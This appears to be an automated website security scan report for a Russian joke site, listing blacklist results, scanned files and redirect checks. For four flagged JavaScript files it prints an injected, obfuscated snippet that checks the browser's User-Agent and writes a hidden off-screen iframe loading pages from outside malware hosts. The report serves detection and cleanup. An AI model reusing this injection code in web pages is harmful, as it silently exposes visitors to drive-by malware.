Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=smeysyatut.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://smeysyatut.ru/
Result: The website is marked by Yandex as suspicious — visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious — visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://smeysyatut.ru/ | 200 OK Content-Length: 47533 Content-Type: text/html | clean |
http://smeysyatut.ru/media/system/js/caption.js | 200 OK Content-Length: 570 Content-Type: application/javascript | clean |
http://smeysyatut.ru/plugins/content/mavikthumbnails/slimbox/js/slimbox.js | 200 OK Content-Length: 2185 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antiviruses (see below). The injected snippet writes its hidden iframe only for visitors whose User-Agent string passes its checks, so a scan from a different client may report the same file as clean.
function Opelcorsamodel() {
var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.armincl.info/cardelasa.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); (function(){ fu } if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://vuretar.firebox-host.net/gfjvbnhgfkyupiu12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://smeysyatut.ru/plugins/content/rusbuttons/odkl_share.js | 200 OK Content-Length: 2185 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antiviruses (see below).
function Opelcorsamodel() {
var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.armincl.info/cardelasa.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); (function(){ fu } if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://vuretar.firebox-host.net/gfjvbnhgfkyupiu12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://smeysyatut.ru/plugins/content/ji_votitaly/js/votitalyplugin.js | 200 OK Content-Length: 7185 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antiviruses (see below).
function Opelcorsamodel() {
var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.armincl.info/cardelasa.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); (function(){ fu default: return 'undefined'; } }, log: function (string) { this.logmessages.include(string); }, showLogs: function () { this.logmessages.each(function (message) { console.log(message); }); }, hasLogs: function () { return this.logmessages.length > 0; }, emptyLogs: function () { this.logmessages = []; } }); VotitalyPlugin.implement(new Options); Antivirus reports:
| ||
http://smeysyatut.ru/templates/new_template/script.js | 200 OK Content-Length: 4592 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antiviruses (see below).
function Opelcorsamodel() {
var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.armincl.info/cardelasa.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); (function(){ fu } ready(); })(); } if (browser.opera) { document.addEventListener('DOMContentLoaded', function() { for (var i = 0; i < document.styleSheets.length; i++) { if (document.styleSheets[i].disabled) { setTimeout(arguments.callee, 10); return; } } ready(); }, false); } if (browser.safari || browser.chrome) { var numStyles; (function() { if (d Antivirus reports:
| ||
http://vkontakte.ru/js/api/share.js?10 | 200 OK Content-Length: 10156 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 100803 Content-Type: application/javascript | clean |
http://smeysyatut.ru/thebest | 200 OK Content-Length: 35657 Content-Type: text/html | clean |
http://smeysyatut.ru/sobranie | 200 OK Content-Length: 34040 Content-Type: text/html | clean |
http://smeysyatut.ru/freshanekdots | 200 OK Content-Length: 36490 Content-Type: text/html | clean |
http://smeysyatut.ru/stories | 200 OK Content-Length: 32290 Content-Type: text/html | clean |
http://smeysyatut.ru/evrhumor | 200 OK Content-Length: 30036 Content-Type: text/html | clean |
http://smeysyatut.ru/sssr | 200 OK Content-Length: 31737 Content-Type: text/html | clean |
http://smeysyatut.ru/worldanekdots | 200 OK Content-Length: 33200 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: smeysyatut.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 00:21:19 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 27 Aug 2014 00:21:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1da9ee93f911af4dda5c839d2b420c8f=15fc96048a9be1d337b0af1c7c0c0694; path=/
GET / HTTP/1.1
Host: smeysyatut.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 00:21:19 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 27 Aug 2014 00:21:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1da9ee93f911af4dda5c839d2b420c8f=15fc96048a9be1d337b0af1c7c0c0694; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: smeysyatut.ru
Referer: http://www.google.com/search?q=smeysyatut.ru
Result:
The result is similar to the first query; no suspicious redirects were found.
GET / HTTP/1.1
Host: smeysyatut.ru
Referer: http://www.google.com/search?q=smeysyatut.ru
Result:
The result is similar to the first query; no suspicious redirects were found.